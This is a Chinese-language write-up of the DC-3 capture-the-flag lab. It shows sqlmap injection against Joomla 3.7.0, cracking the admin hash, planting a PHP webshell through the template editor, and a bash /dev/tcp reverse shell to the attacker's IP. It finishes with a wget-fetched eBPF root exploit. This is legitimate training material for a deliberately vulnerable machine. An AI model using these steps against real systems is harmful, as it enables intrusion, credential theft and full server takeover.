渗透测试靶机：DC-3

goGoGO!!!

今天我们做DC-3。

: )

---

0X00 环境准备

靶机下载地址：http://www.five86.com

攻击机           ：Kali

可能会问靶机导入情况，这里有个小插曲，我们下面再说...

0X01 开始渗透

局域网主机发现

nmap获取信息

发现只开放了80端口，我们尝试访问，但是显示页面错误，和其他大佬的wp也不一致，经过判断，应该是靶机的问题

一开始我的靶机是下载的DC-3，由VirtualBox导入

后续，我下载的DC-3VM。在打开虚拟机的过程会出现一个错误

解决方法是，修改.vmx文件，将下面标红的框改为9即可，默认是16。修改之后，靶机能够正常打开。

进过一番折腾，总结是，这个虚拟机开启之后，需要等一阵子，才能可靠的访问，它需要启动一部分服务。好了，我们正式开始：

---

先来看一下DC-3的介绍

大体意思：这个靶机是为初学者设计的，只有一个Flag，一个入口，没有任何线索，必须具备Linux技能和Linux命令行、基本渗透测试工具的经营。Google或联系作者，他会帮你提供思路。

主机发现 &&  nmap扫描

确实只开了80，我们访问一下

Kali joomscan 开扫

joomscan --url 192.168.1.105

扫描结果很简洁，版本、默认后台管理路径，ip/administrator

找Joomla 3.7.0对应的漏洞，

渗透测试就是搜集信息，以此直接或间接找到脆弱点

查看对应的.txt

Kali Sqlmap直接使用上图中的payload，记得将localhost修改为对应IP，稍微等待，甚至可以换一个背景...

结果出来了，存在注入，剩下的考察的是Sqlmap的使用

sqlmap -u PAYLOAD --current-db             查看当前使用数据库
sqlmap -u PAYLOAD -D 数据库名字 --tables    查看表

我们把__users表中的内容dump出来

sqlmap -u PAYLOAD -D 数据库名字 -T 表名 --dump

结果如下

将hash值存入admin_hash文件中，利用Kali中自带的工具john爆破hash值

john admin_hash

结果出来了，速度很快

用户名：admin

密码    ：snoopy

访问管理登录页面，登录

登录成功

下一步目标，GetShell：

在模板这里，可以编辑PHP代码

我们新建一个文件，在其中写入PHP一句话Mu马

接下来，使用一个新的工具：继承中国菜刀意志的，中国剑蚁，同样是第一次使用，第一次总是伴随着兴奋...

中国剑蚁安装过程：https://blog.csdn.net/qq_36235492/article/details/85713821

连接过程和菜刀一致，连上，起Shell

Linux查看版本

使用searchsploit来搜索Ubuntu 16.04的漏洞，有一个“拒绝服务漏洞”，可以提权

cat一下对应的39772.txt

EXP在.txt的最后一行

因为剑蚁是非持续连接，这里我们反弹Shell提权

同样，在刚才模板templates处，新建一个文件 Shell2019.php，编辑PHP代码

192.168.1.100是我的Kali

& /dev/tcp/192.168.1.100/8888 0>&1' ");
?>
OK!

在Kali中nc监听8888端口

在浏览器中，访问http://192.168.1.105/templates/protostar/Shell2019.php

注意：这里模板的名字是小写的，我一开始是访问Protostar，都是404

再如，上上图中，下面的红框框，已经获得Shell了

下面开始利用上面的EXP

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

unzip 39772.zip
cd 39772
ls
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh
ls
./doubleput
whoami

Root !

Flag Get!

---

很有实战意义的一个靶机，很棒。

加油！

继续。